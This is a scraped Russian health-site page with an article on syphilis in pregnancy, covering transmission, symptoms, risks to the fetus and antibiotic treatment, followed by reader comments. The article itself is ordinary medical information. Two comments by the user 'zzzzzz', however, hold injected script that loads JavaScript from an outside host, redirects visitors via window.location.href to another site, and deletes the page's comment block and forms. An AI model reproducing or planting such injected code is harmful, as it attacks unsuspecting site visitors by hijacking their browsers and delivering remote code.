Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сифилис и беременность. К...  >>  Сифилис и беременность. Как защититься?
 
Обратная связь
 

Сифилис и беременность. Как защититься?

Размер шрифта
21 мая 2014 00:00
  • google_analytics: false
  • Нравится

Планируете беременность? Не забудьте провериться на сифилис! О том, чем опасно это заболевание для мамы и ребенка, как от него вылечиться, читайте в нашей статье.

Сифилис и беременность. Как защититься?

РаспространенностьСифилис – это заболевание, которое передается половым путем и вызывается бактерией Treponema pallidum. Каждый год в США сифилисом заболевают около 1000 беременных. Обычно заражение происходит при прямом контакте с сифилитическими язвами (шанкрами), которые обнаруживаются на наружных половых органах, анусе, влагалище, прямой кишке.

Симптомы

Первый признак сифилиса – появление шанкра, который образуется там, где бактерии проникли в организм. Он появляется через три недели (но иногда и через несколько лет!) после контакта с больным.
Шанкр – это плотная, округлая и безболезненная язва, на которую часто не обращают внимания – и зря! Обычно эта стадия сифилиса длится 3-6 недель. При отсутствии лечения развивается сыпь, которая может находиться на любых участках кожи, даже ладонях и подошвах. Повреждения белого или серого цвета образуются во рту, в паху, в подмышках. При отсутствии лечения болезнь прогрессирует.

Опасность для мамы и ребенка

На последней стадии сифилиса, которая развивается через 10-30 лет после заражения, происходят повреждения мозга, нервов, глаз, сердца, сосудов, печени, костей и суставов, в результате чего наступает смерть. У больных сифилисом повышен риск заражения ВИЧ. Больная женщина может передать сифилис плоду, в результате он рождается преждевременно или мертвым. Такие дети имеют низкую массу тела, у них высок риск инфекционных заболеваний. Часто они в течение всей жизни страдают от двигательных нарушений, задержки социального развития, низкой обучаемости. При отсутствии своевременного лечения у ребенка развиваются катаракта, глухота и другие патологии.

Лечение

Сифилис легко лечится антибиотиками, например, пенициллином, которые убивают бактерии, находящиеся в организме. Однако они не избавляют от повреждений, уже нанесенных организму заболеванием.

Понравилось? Читайте больше в нашем спецпроекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
ВИЧ и беременность. Как защититься?   Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Хламидия и беременность. Как защититься?   Набрали вес на ранних сроках беременности? У вас будет толстый ребенок!  
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Можно ли пережить беременность без рвоты?
Герпес и беременность. Как защититься?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.